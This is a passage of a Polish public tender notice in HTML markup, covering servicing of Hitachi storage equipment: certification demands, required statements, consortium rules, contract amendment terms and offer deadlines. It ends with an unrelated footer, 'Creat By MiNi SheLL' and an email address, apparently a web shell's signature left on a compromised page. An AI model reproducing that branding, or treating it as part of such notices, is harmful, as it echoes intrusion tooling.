w Opisie Przedmiotu Zamówienia dla Części 1 (Załącznik nr 1 do SWZ).<br/>Zamawiający dopuszcza możliwość wykazania spełnienia powyższego warunku w taki sposób, iż dana osoba skierowana<br/>przez Wykonawcę do realizacji zamówienia posiada jednocześnie oba wymagane ww. certyfikaty (lub ww. równoważne im<br/>dokumenty).<br/>- w przypadku złożenia oferty dla Części 2: dysponuje przynajmniej 2 osobami, które zostaną skierowane przez Wykonawcę<br/>do realizacji zamówienia, posiadającymi ważne certyfikaty producenta uprawniające do obsługi i serwisowania urządzeń<br/>Hitachi wymienionych w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 2 (Załącznik nr 2 do SWZ) – „Installing and<br/>Supporting Hitachi Virtual Storage Platform Midrange Family” lub równoważne temu certyfikatowi dokumenty producenta<br/>uprawniające do obsługi i serwisowania urządzeń Hitachi wymienionych w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla<br/>Części 2 (Załącznik nr 2 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">#1. Do oferty Wykonawca dołącza oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp. Wzór ww. oświadczenia stanowi Załącznik nr 12 do SWZ. #2. W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. #3. W przypadku polegania na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, Wykonawca składa<br/>także oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>podmiotu udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">#1. Do oferty Wykonawca dołącza oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w Rozdz. VI ust. 2 SWZ – wzór ww. oświadczenia stanowi Zał. nr 12 do SWZ.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, Wykonawca składa także oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotu udostępniającego zasoby.<br/>#2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia (Części zamówienia, na którą Wykonawca składa ofertę) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca, realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <br/>#3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku zaistnienia okoliczności, o których mowa w art. 117 ust. 3 ustawy Pzp, składają wraz z ofertą oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone wg wzoru w Zał. nr 15 do SWZ, z którego będzie wynikać, które usługi wykonają poszczególni Wykonawcy – w celu potwierdzenia, że polegają na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>#4. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia:<br/>1) Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączenia dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Ww. okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>Wzór Wykazu usług stanowi Zał. nr 13 do SWZ.<br/>2) Opisu środków organizacyjno-technicznych stosowanych przez Wykonawcę w celu zapewnienia jakości, potwierdzającego, że Wykonawca dysponuje odpowiednimi zdolnościami technicznymi wyrażającymi się w tym, że Wykonawca jest autoryzowanym partnerem producenta co najmniej w zakresie urządzeń Hitachi wymienionych odpowiednio:<br/>- w przypadku złożenia oferty dla Części 1: w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 1,<br/>- w przypadku złożenia oferty dla Części 2: w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 2;<br/>3) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami. Wzór Wykazu osób stanowi Zał. nr 14 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie konsorcjum) pod warunkiem, że ustanowią oni pełnomocnika, określając zakres jego uprawnień, oraz spełnione będą następujące wymagania:<br/>1) zgodnie z Rozdziałem VII część A ust. 10 SWZ, Wykonawcy wspólnie ubiegający się o zamówienie złożą wraz z ofertą<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia, w którym wskazano w szczególności:<br/>a) postępowanie o udzielenie zamówienia publicznego, którego dotyczy,<br/>b) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>c) ustanowionego pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz zakres uprawnień<br/>pełnomocnika;<br/>2) oferta Wykonawców wspólnie ubiegających się o zamówienie musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) z treści Formularza oferty powinno wynikać, że oferta składana jest w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia: w odpowiednim miejscu w Formularzu oferty dla danej Części zamówienia (odpowiednio Załącznik<br/>nr 10 do SWZ lub Załącznik nr 11 do SWZ) należy wpisać nazwy wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia i dane umożliwiające ich identyfikację;<br/>4) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi oddzielnie wykazać, że nie podlega<br/>wykluczeniu z postępowania na podstawie przesłanek określonych w Rozdziale VI ust. 2 SWZ;<br/>5) w odniesieniu do warunków udziału w postępowaniu określonych w Rozdziale VI ust. 7 SWZ Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia muszą wykazać, że spełniają ww. warunki udziału w postępowaniu łącznie.<br/>Uwaga: Zgodnie z Rozdziałem XVII ust. 5 SWZ, jeżeli zostanie wybrana jako najkorzystniejsza oferta Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, przed zawarciem umowy w sprawie zamówienia publicznego, na<br/>wezwanie Zamawiającego, Wykonawca przedłoży kopię umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> #1. Zmiana Umowy dopuszczalna jest w zakresie i na warunkach przewidzianych przepisami ustawy Prawo zamówień<br/>publicznych.<br/>#2. W przypadku zmiany stawki podatku od towarów i usług, wynagrodzenie brutto przewidziane Umową ulegnie zmianie<br/>odpowiedniej do zmiany wysokości podatku od towarów i usług lub podatku akcyzowego, przy czym powyższa zmiana<br/>będzie miała zastosowanie wyłącznie w odniesieniu do wynagrodzenia objętego fakturami wystawionymi po dacie wejścia w życie zmiany przepisów prawa wprowadzających nowe stawki podatku od towarów i usług lub podatku akcyzowego. W sytuacji wystąpienia powyższych okoliczności Wykonawca składa pisemny wniosek o zmianę Umowy w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy. Obowiązek wykazania wpływu zmian na koszty wykonania zamówienia należy do Wykonawcy pod rygorem odmowy dokonania zmiany Umowy przez Zamawiającego.<br/>#3. W przypadku zmian:<br/>1) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, lub<br/>2) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu, lub<br/>3) wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>Strony wprowadzą zmianę wysokości wynagrodzenia Wykonawcy odpowiednią do kwoty, o jaką wskutek tych zmian<br/>zmianie ulegnie koszt wykonania Przedmiotu Umowy przez Wykonawcę. Warunki wprowadzenia ww. zmian są opisane w<br/>paragrafie 14 ust. 5-8 odpowiednio Projektu umowy dla Części 1 (Załącznik nr 3 do SWZ) oraz Projektu umowy dla Części 2<br/>(Załącznik nr 4 do SWZ).<br/>#4. Zmiana Umowy dopuszczalna jest w przypadku, gdy nastąpiła zmiana przepisów prawa powszechnie obowiązującego,<br/>która ma wpływ na termin, sposób lub zakres realizacji przedmiotu Umowy.<br/>#5. Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, o których mowa w paragrafie 10<br/>ust. 1 odpowiednio Projektu umowy dla Części 1 (Załącznik nr 3 do SWZ) oraz Projektu umowy dla Części 2 (Załącznik nr 4<br/>do SWZ) , mogą wpłynąć lub wpływają na należyte wykonanie Umowy, może w uzgodnieniu z wykonawcą dokonać zmiany<br/>Umowy, w szczególności przez:<br/>1) zmianę terminu wykonania Umowy lub jej części, lub czasowe zawieszenie wykonywania Umowy lub jej części,<br/>2) zmianę sposobu wykonywania usług,<br/>3) zmianę zakresu świadczenia wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia wykonawcy – o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami składa się za pośrednictwem Platformy on-line działająca pod adresem: https://e-ProPublico.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com